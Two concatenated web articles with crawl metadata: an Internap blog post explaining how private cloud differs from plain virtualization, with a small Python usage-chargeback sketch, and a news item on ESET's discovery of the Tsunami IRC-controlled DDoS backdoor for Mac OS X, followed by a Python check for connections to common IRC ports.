With all the hype around cloud these days, figuring out where cloud fits and where it doesn't can be challenging. Private cloud and virtualization often get confused with each other, but in fact, virtualization is usually a component of cloud, whether public or private. Let's consider a couple of real-world examples to illustrate the difference between virtualization and a true private cloud deployment.

Example 1 – Virtualization
An IT department, continually installing and reinstalling new servers, implements a virtualization solution so they can provision infrastructure faster and consolidate servers. They virtualize servers using their hypervisor of choice along with management tools. They upload ISO files into their management software so they can install new OSes into new virtual machines. They're connected to the local network in order to manage the virtual machines or the orchestration software used for provisioning. And if they are charging back capacity to their internal customers' budgets (Marketing, Sales, Engineering, etc.), they're probably just splitting the cost between each group, or maybe tracking how many virtual machines they deploy for each department.

Is this cloud? Not really. This is known as server consolidation, data center automation, etc., and the solution doesn't meet all five characteristics of cloud computing:
- On-demand self-service (IT still has to provision virtual machines for their internal customers).
- Broad network access (this deployment is only available to internal customers on the network).
- Resource pooling (this is where virtualization fits, so yes, this requirement is met).
- Rapid elasticity (IT still has to provision VMs individually by installing the OS and software, and they don't necessarily scale fast).
- Measured service (IT is charging costs back to other departments based on traditional budgeting, not based on actual usage).

Example 2 – Private Cloud
A company's headquarters includes a central IT staff that supports company-wide and departmental applications. They also have several branch offices, each with a local IT staff that focuses on break/fix repair of local desktops and network services. The branch offices may occasionally set up a local server and install software at a manager's request, but they may prefer to ask central IT to provide supported servers or applications from HQ. Central IT is looking to provide better support for their branch offices without hiring more staff, speed up turnaround time when provisioning services for supported applications, and even offer quick, easy servers on demand to their branch offices for local, unsupported applications. So they install their hypervisor of choice, deploy storage in their preferred manner and add some management software. However, in addition to providing ISO files for VM installation, they also prepare some disk images with pre-installed, supported OSes. The management software allows multiple users of different access levels to perform tasks such as launching virtual machines, installing VMs from supported images or from unsupported ISOs, rebooting machines or reconfiguring virtual networks between VMs. Now the Marketing department in a branch office can try out some new analytics software by logging into a portal, provisioning a new server, installing the trial software and using it for a few days. If they don't like it, they turn it off and delete the VM.
Engineering may deploy multiple VMs to set up a production application, but also spin up a few additional VMs to use as development and staging environments or continuous integration servers. They no longer have to put in capital budget requests for servers, or search through old supply closets for dusty old desktops to repurpose when needed. Is this a private cloud? Yes! This company is still using virtualization, but now they’ve added a level of self-service for branch offices. The service can be accessed using a VPN connection over the Internet or an SSL/TLS web-based portal (broad network access). Branch employees or local IT staff can spin up additional capacity quickly and turn it off just as fast (rapid elasticity). As a result, central IT can now meter actual usage of each service by various departments on a monthly or even hourly basis and charge those departments accordingly. So, while virtualization tends to be a component and enabler of cloud services, true cloud services provide specific benefits to both the consumers and the IT departments deploying them.
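To make the "measured service" characteristic concrete, here is a small illustrative sketch that is not part of the original article: the department names, VM sizes and hourly rates are invented, and a real private cloud would pull usage records from its management or orchestration layer rather than hard-code them. It simply shows what metering actual usage and charging it back per department amounts to.

from collections import defaultdict

# Hypothetical hourly rates per VM size.
RATE_PER_HOUR = {"small": 0.05, "medium": 0.10, "large": 0.20}

# Usage records as (department, vm_size, hours_run) for one billing period.
usage = [
    ("marketing", "small", 72),     # trial analytics server, deleted after 3 days
    ("engineering", "large", 720),  # production app, ran the whole month
    ("engineering", "medium", 200), # staging environment
]

def chargeback(records):
    """Sum metered usage into a per-department bill."""
    bills = defaultdict(float)
    for department, size, hours in records:
        bills[department] += RATE_PER_HOUR[size] * hours
    return dict(bills)

print(chargeback(usage))
# {'marketing': 3.6, 'engineering': 164.0}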
<urn:uuid:b9019189-13cf-447f-b594-3edd380a5e18>
CC-MAIN-2017-04
http://www.internap.com/2013/06/04/private-cloud-vs-virtualization/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00124-ip-10-171-10-70.ec2.internal.warc.gz
en
0.930233
893
2.640625
3
Malware authors have taken an old piece of malware developed for Linux and modified it to attack the Mac OS X platform, warns ESET. The OS X malware has been named Tsunami after the original, and the name hints at its main function: roping the targeted computer into a botnet for executing Distributed Denial of Service attacks. Tsunami is controlled through IRC, and it contains a hardcoded list of IRC servers and channels to which it tries to connect once it is entrenched on the victim's computer. The list of commands that the C&C server can send to the client program shows that the malware can do many other things as well. What should worry users the most is that once Tsunami is installed on their computers, it can download further files (other malware or an update of its own functionality) and execute shell commands. It is still unknown what attack vector is used to land this particular piece of malware on targeted machines, but it is safe to say that users should definitely decline any overt offers to make their computers part of a botnet, be extremely careful about unsolicited emails carrying attachments or embedded links, and keep their AV solutions up to date.
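Beyond keeping AV up to date, one rough way to spot an IRC-controlled bot of this kind is to look for processes holding connections to the conventional IRC ports. The sketch below is only a heuristic illustration, not ESET's detection method: it uses the third-party psutil library, assumes the bot talks on the standard ports 6667 or 6697 (a real bot can use any port), and typically needs root privileges to inspect other users' processes.

import psutil

# Conventional IRC ports (plaintext and TLS); a real bot may use anything.
IRC_PORTS = {6667, 6697}

def suspicious_irc_connections():
    """Yield (pid, process name, remote address) for established TCP
    connections whose remote port looks like IRC."""
    for conn in psutil.net_connections(kind="tcp"):
        if conn.status != psutil.CONN_ESTABLISHED or not conn.raddr:
            continue
        if conn.raddr.port in IRC_PORTS:
            try:
                name = psutil.Process(conn.pid).name() if conn.pid else "?"
            except psutil.NoSuchProcess:
                name = "?"
            yield conn.pid, name, f"{conn.raddr.ip}:{conn.raddr.port}"

if __name__ == "__main__":
    hits = list(suspicious_irc_connections())
    if hits:
        for pid, name, remote in hits:
            print(f"PID {pid} ({name}) -> {remote}")
    else:
        print("No established connections to common IRC ports found.")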
<urn:uuid:cb3f10a9-828d-4443-a6e9-1e91aaa396ee>
CC-MAIN-2017-04
https://www.helpnetsecurity.com/2011/10/26/tsunami-a-new-backdoor-for-mac-os-x/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281353.56/warc/CC-MAIN-20170116095121-00334-ip-10-171-10-70.ec2.internal.warc.gz
en
0.951496
250
2.765625
3